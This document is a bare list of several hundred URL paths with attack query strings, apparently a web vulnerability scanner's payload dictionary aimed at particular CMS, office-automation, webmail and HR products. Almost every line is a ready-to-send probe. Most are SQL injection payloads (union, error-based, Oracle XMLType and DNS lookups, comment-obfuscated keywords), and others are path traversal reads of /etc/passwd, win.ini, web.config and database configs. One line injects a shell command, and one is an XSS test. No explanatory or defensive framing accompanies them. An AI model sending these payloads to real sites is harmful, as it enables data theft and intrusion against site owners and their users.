/poweb/CDHelp.jsp?ISOID=3'%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,char%28104%29%2bchar%28107%29%2bchar%2858%29%2bchar%2849%29%2bchar%2858%29%2bchar%2849%29%2bchar%2857%29%2bchar%2857%29%2bchar%2855%29,null,null,null%20%20--%20
/information/OA_InforList.asp
/information/OA_PingLun.asp?PLType=1&POAID=54'%20and+1=char(106)%20--
/information_manager/informationmanager_upload.jsp?upload=1&dispControl=null&saveControl=null
/public/jsp/multiuploadfile.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&photos=null
/public/jsp/smartUploadPic.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jspx,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0
/jdwz/qtpage/findAllPoint.jsp?dtcxlb=vcsfjg&point_name=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2CNULL--%20&vcsfjg=all
/jdwz/newsAction.do?flag=flag&NewsId=-12'%20union%20all%20select%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29,12,12,12,12,12,12,12,12--
/caigou/NoticeList.aspx?Type=%27%2b+(select+convert(int%2cCHAR(106)%2bCHAR(105)%2bCHAR(120))+FROM+syscolumns)+%2b%27
/MailExportDo.asp?dellist=-1234%29%20or%203438%3DCONVERT%28INT%2C%28SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2b%28SELECT%20%28CASE%20WHEN%20%288986%3D8986%29%20THEN%20CHAR%28105%29%20ELSE%20CHAR%2848%29%20END%29%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%29%29%20%20AND%20%281602%3D1602
/mailClassInfor.asp
/MessageInfoDis.asp?VOID=26%20and%201122%3DCONVERT%28INT%2C%28SELECT%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%29%29%20--
/Include/DepartmentSet_Right.aspx?BI_ID=1'%20and%20(select%2b(char(106)%2bchar(120)%2bchar(106)%2bchar(120)))%3E0--
/jcms/m_1_9/user/down.jsp?pathfile=../jcms/m_1_9/user/down.jsp
/tophp.asp
/Manage/CalendarMemo/event.ashx
/RuvarHRM/web_common/file_download.aspx?hr_file_storage_id=1')%20and%20(select%20char(106)%2bchar(106))%3E0--
/SysManage/bbsSet/BoardInfo.aspx?board_id=-1'%20and%20(select%20char(106)%2bchar(106))%3E0--&level=1
/SysManage/include/SelectUnderling.aspx?u_underling=(select%20char(106)%2bchar(106)))--'
/SysManage/MailSet/select_mail.aspx?corp_id=(select%20char(106)%2bchar(106))%20--
/workflow/OfficeFileDownload.aspx?filename=1'%20and%20(select%20char(106)%2bchar(106))%3E0%20--
/SysManage/get_department.aspx?corpID=char(106)%2bchar(106)
/SysManage/role_setting_new.aspx?id=char(106)%2bchar(106)
/resource/jpk/search.jsp?coursetype=0&applyyear=0&university=%CF%C3%C3%C5%B4%F3%D1%A7&subject1=0&subject2=0&name=%25%27%20AND%201122%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%28104%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2849%29%7C%7CCHR%2857%29%7C%7CCHR%2857%29%7C%7CCHR%2855%29%29%29%20FROM%20DUAL%29%20AND%20%27%25%27%3D%27
/oa/download_attach.aspx?attach_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
/SysManage/departmentset_corpshow.aspx?bi_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
/SysManage/role_show.aspx?role_id=char(106)%2bchar(106)
/lates/index.html?username=123%27%2f%2a%2a%2fand%2f%2a%2a%2f%28seleselectct%2f%2a%2a%2f1%2f%2a%2a%2ffrom%2f%2a%2a%2f%28selselectect%2f%2a%2a%2fcount%28%2a%29%2Cconcat%280x7c%2C0x7765627363616E3A693A66696E64%2C0x7c%2Cfloor%28rand%280%29%2a2%29%29x%2f%2a%2a%2ffrom%2f%2a%2a%2finformation_schema.tables%2f%2a%2a%2fgroup%2f%2a%2a%2fby%2f%2a%2a%2fx%29a%29%23
/kaoqin/JiaoYanDis.asp
/admin/accounts_list.aspx?u_department_id=1'%20and%20(char(106)%2bchar(106))%3E0--
/tj/list.aspx?typeid=1'%20and%20(char(106)%2bchar(106))%3E0--
/filemanage/FolderPower.aspx?folder=1'%20and%20(char(106)%2bchar(106))%3E0--
/OperationManage/ViewSecrecyGuestBookMessage.aspx?sn=-12'%20and%20(char(106)%2bchar(106))%3E0--&sp=amdin&oid=0&type=2
/Manage/CalendarMemo/load.ashx
/php/report/include/ldap.inc
/php/report/include/util.inc
/php/report/include/config.inc
/php/report/lastlogin_list_export.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
/user/storage_explore.php
/grad/admin/domain_logo.php
/user/storage_fold_explore.php
/php/mailaction1.php?action=x&index=1.2;echo+123456%3Ex1.txt
/user/send_queue/upload_addition.php
/php/report/search_lastlogin.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
/php/bill/list_userinfo.php?domain=site.org&ok=1&cp=1%20union%20select%20md5(1122),2,3,4,5%23
/grad/admin/admin_logo_upload.php
/common/codewidget.jsp?code=1'%20AND%201=char(106)%20--
/download.ashx?files=../web.config
/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise
/?question/search/%27%75nion%20select%201,2,3,4,5,6,7,8,md5(1122),10,11,12,13,14,15,16,17,18,19,20%23
/jcms/m_1_9/user/down.jsp?abspathfile=/etc/passwd
/Edit/ShowEdit.aspx?Dir=../../&OpenWords=TxtTagKey
/jis/manage/databak/showlog.jsp?path=../showlog.jsp
/download.jsp?path=UserFiles/../download.jsp
/tt/trade/register.asp?step=checkdup&checkname=ologinname&checkval=haha'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&pk=0
/zwgkinfo/DepartMentInfoList.aspx?CategoryNum=-12'/**/and/**/1=char(106)--&DeptCode=
/jis/interface/offer.jsp?flag=user
/jis/down.jsp?pathfile=./down.jsp%00.jpg
/MockLogin.aspx
/mobile/user.php?act=order_list
/seeyon/management/status.jsp
/api/download.ashx?fid=nUDWEgdorSH4j/+9GiQTlA==
/monitoring?part=web.xml
/?/s_tag/hehe%25%27%20union%20select%201,2,3,md5(1122),5,6,7%20from%20go_admin%23
/download.action?fullPath=./WEB-INF/web.xml
/jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig
/jis/update/update.jsp?fn_billstatus=U
/install/install.php
/public/minify.php?f=../ooxxooxxo/hehe.js
/admin/index.asp
/plus/outside.php?id=../template/default/style/yun_index.css%00
/productpic.aspx?id=100611)%20and%201=char(106)%20--
/jsp/util/file_download.jsp?filePath=../../../../../../../etc/passwd
/jsp/util/file_download.jsp?filePath=c:%5Cwindows%5Cwin.ini%00.xml
/jcms/m_5_5/m_5_5_3/import.jsp
/upload!uploadImg.action
/AuthReturn.aspx?APTokenResponse=a$8SOIYyiGVYBge5mdoY5nIeAueY7BixUtLdHqpy8o3RqM9hVnisaXAA==
/?do=index&mod=goods
/index.php/*123*/'union/**/select/**/1,2,3,4,5,6,7,8,md5(1122),10,11%23&action=getatlbyid
/cart.aspx?act=spikebuy&spikeid=3%20and%201=char(106)%2bchar(120)%20--
/webmail/client/mail/index.php?module=operate&action=down&file=./../../mainconfig.php
/MoreIndex.aspx?pkId=6434&kw=a'%20and%201=char(106)%20--&st=2&t=1
/RuvarHRM/web_include/select_baseinfo.aspx?bt_name=1')%20%20and%20(char(106)%2bchar(106))%3E0--
/Default.aspx?item=1)%20and%201=(char(106)%2bchar(106))%20--
/news/searchNewsAction.shtml?keywords='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
/zwfw/zwfwInfoAction!execute.shtml?action=5&sid='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
/news/newsInfoAction.shtml?infotype=-1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20and%20'at'='at
/client/checkuser.aspx?user=test'%20and%20char(106)%3E0--&pwd=1
/siteserver/userRole/modal_sendMail.aspx?From=User&UserNameCollection=test'+and+char(106)%2bchar(106)=0%20--
/admin/include/config.php?depth=../../templates/default/images/css/metinfo.css%00
/admin/login/login_check.php?depth=../../templates/default/images/css/metinfo.css%00&admin_index=1
/admin/system/lang/lang.func.php?depth=../../../public/js/public.js%00
/webusr/check.aspx?loginname=nosec'%20and%201=char(106)%2bchar(106)%20--%20
/plugins/phpdisk_client/client_sub.php?action=upload_file
/ExhibitionCenter.aspx?area=-12'%20and/**/1=char(106)/**/--
/SupplyList.aspx?parentid=88&classid=-12%20and/**/1=char(106)/**/%20--%20
/company/SearchProducts.aspx?id=115&keyname=ppp%25'%20and/**/1=char(106)/**/%20--%20
/Web/Login.aspx
/Web/KeySearch.aspx?searchid=1234
/portal/admin/setright.aspx?id=-1
/infolist.aspx?ClassId=5)%20and%201122=CONVERT(INT,(SELECT%20CHAR(84)%2bCHAR(97)%2bCHAR(105)%2bCHAR(87)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(103)%2bCHAR(111)%2bCHAR(58)%2bCHAR(104)%2bCHAR(111)%2bCHAR(109)%2bCHAR(101)))%20AND%20(1=1
/guestbook.aspx?do=show&id=1%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,char(106)%2bchar(106)%2bchar(108)%20--
/prog/filedown.php?pe_id=MQ==
/emlib4/system/DataSource/GetDataGridCtrlResult.aspx?_debug_=undefined
/emlib4/format/release/aspx/eml_userwh.aspx
/voteresult.aspx?activeid=-1%20UNION%20SELECT%201,char(106)%2bchar(106),3,4,5%20from%20syscolumns%20--
/kbase_list.aspx?kcatid=1%20UNION%20SELECT%201,2,char(106)%2bchar(106),4,5,6,7,8%20from%20syscolumns--
/getTopLinksPortalCategoriesAction.action?siteId=../../../../../../../../../../windows/win.ini%00.jpg
/letter/letter_detail.aspx?id=8'%20%20and+1=char(106)%2bchar(106)%20--
/cms/infopub/rss.jsp?channelcode=-A%27%20union%20all%20select%20char%28106%29%2bchar%28106%29%2Cnull%2Cnull%2Cnull%20--&maxnum=20
/web/doc_hit.jsp?documentid=-21%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
/OperationManage/BlogMoreIndex.aspx?pkId=&blogId=1&kw=abc'%20and%201=char(106)%20--&st=1&t=1
/Tools/stream/FlvStream.ashx?file=./Index.aspx
/tj/total.aspx?act=other&typeid=1%27%20AND%209518%3DCONVERT%28INT%2C%28SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2b%28SELECT%20%28CASE%20WHEN%20%289518%3D9518%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2bCHAR%28100%29%29%29%29%20AND%20%27xhJK%27%3D%27xhJK
/webConfigSet/configSetting.aspx?url=/login/index.aspx
/cms/cms/infopub/gjjs.jsp?pubtype=S&pubpath=dkt&startdate=&enddate=&topic=&content=&authorname=&origin=&description=&webappcode=A02&searchdir=A02&templetid=-21'%20union%20all%20select%20char(106)%2bchar(62)%2bchar(60),null,null%20--
/mydocument/download.aspx
/prog/get_passwd_1.php?user=hehe%3Cscript%3Ealert(42873)%3C/script%3E%20
/cjwtlist.aspx?t=(select+convert(int%2c@@version))
/FormBuilder/PrintFormList.aspx?file_id=1)/**/UNION/**/ALL/**/SELECT/**/CHR(97)%7C%7CCHR(60)%7C%7CCHR(99),NULL/**/FROM/**/DUAL/**/--
/module/sitesearch/index.jsp?keyword=&columnid=-1650)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&keyvalue=&webid=&currpage=2
/FormBuilder/yjzxList.aspx?id=1/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,CHR(106)%7C%7CCHR(60)%7C%7CCHR(106)/**/FROM/**/DUAL--
/FromBaoShan/LaborSpecial/PlacardView.aspx?info_id=1/**/UNION/**/ALL/**/SELECT/**/CHR(106)%7C%7CCHR(106)%7C%7CCHR(106),NULL,NULL,NULL/**/FROM/**/DUAL--
/goods/GoodsAdd.aspx?goodsid=1/**/AND/**/1122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&flag=2
/pub/search/search_video_view.asp?id=3&mid=4%20and%201122=CONVERT(INT,(SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29))&yh=1
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/main/findgbm2.asp?sql=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name&sqlbak=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name%20&px=
/ebsys/fceform/common/djframe.htm?isfile=release&djsn=eb_runsql
/nameedit.asp?table=bbs&id=1%20union%20all%20select%20null,null,null,null,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),null%20--&action=edit
/jis/front/sdgs/updateuser.jsp
/lm/down.jsp?pathfile=down.jsp
/website/dflz/dflzCjAction!caiwugk_list.action?orgCode=&orgName=&zuOrgCode=&zuOrgName=&cwgkbbh=-21'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--%20&cwgkbmc=
/Documents/FolderInfor.asp?POAID=0'%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
/Documents/FolderInfor.asp?OAID=0%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
/meetingroom/MeetingRoom_UseInfo.asp
/lm/front/api/opr_datacall.jsp?fn_billstatus=E&vc_id=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL--
/downloadFile.action?path=index.jsp
/portal/getJsonData.action?userId=9090&ruleID=portal-common.getProFileInfo
/lm/front/noontimelist.jsp?flag=a&start=1&end=2&sysid=2'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL%20FROM%20DUAL%20--&groupid=4
/php/bill/print_addfeelog.php
/objectbox/selectx_userlist.jsp?fn_Keywords=1'%20UNION%20ALL%20SELECT%20NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL--%20&perm=&cPage=1&tiao=
/meetingroom/ShenQingInforDis.asp?OAID=-12%20AND%201993%20IN%20(char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100))%20---
/information/oa_infordislist.asp?class=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
/information/OA_Condition.asp?class=1&subclass=(CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))))---
/message/mytreedata.asp?bumenid=-12%20AND%201432=CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)))--%20&time=&time=
/house/upload/upload.asp
/sbweb/Upload_Save_2.asp
/feReport/chartList.jsp?delId=1&reportId=1%20and%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--
/jsearch/admin/opr_forcechangepwd.jsp
/home/front/search/opr_chatsearch.jsp?action=simplesearch&words=1%25%27%20union%20all%20select%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20DUAL%20--
/celive/live/index.php?action=1
/admin/Site/AddDomain.aspx?Edit=1&id=1000/**/%20/**/union/**/%20/**/all/**/%20/**//**/SELECT/**/%200,/**/CHAR(106)%2bCHAR(106)%2bCHAR(106),0,0,'',0,2014,0/**/FROM/**/%20ZL_Manager
/baseNews_view.jsp?newsId=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--
/Lesktop/command.aspx
/Lesktop/Management/DeptEdit.aspx?did=1%20and%20char(106)%3E0
/Lesktop/sendfile.aspx
/Office_Supplies/Goods_Main.aspx?type=1&info_id=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/Personnel/Infomation.aspx?userid=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/Personnel/VacationComputation.aspx?id=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/RCMANAGE_New/rcgl.aspx?UID=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/ObjSwitch/HYTZ.aspx?userid=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/modules/pdflist.aspx?info_id=1/**/union/**/all/**/select/**/null,null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),null,null,null/**/from/**/dual%20--
/jcms/m_5_e/init/sitesearch/opr_classajax.jsp?classid=1%20union%20all%20select%2012,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20from%20dual%20--
/lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,md5(1122),0x7e),NULL,NULL,NULL,NULL
/lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL%23
/jcms/jcms_files/jcms1/web2/site/module/comment/opr_readfile.jsp?filename=opr_readfile.jsp
/managerNManager.action
/lm/manage/opr_setappraisal.jsp?fn_billstatus=E&vc_setapprid=-2087%20UNION%20ALL%20SELECT%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL%20FROM%20DUAL--
/jcms/m_1_9/column/getgroupuser.jsp?jgid=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)%20--&spell=2&webid=3&userid=4
/lm/sys/opr_bulletin_show.jsp?vc_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
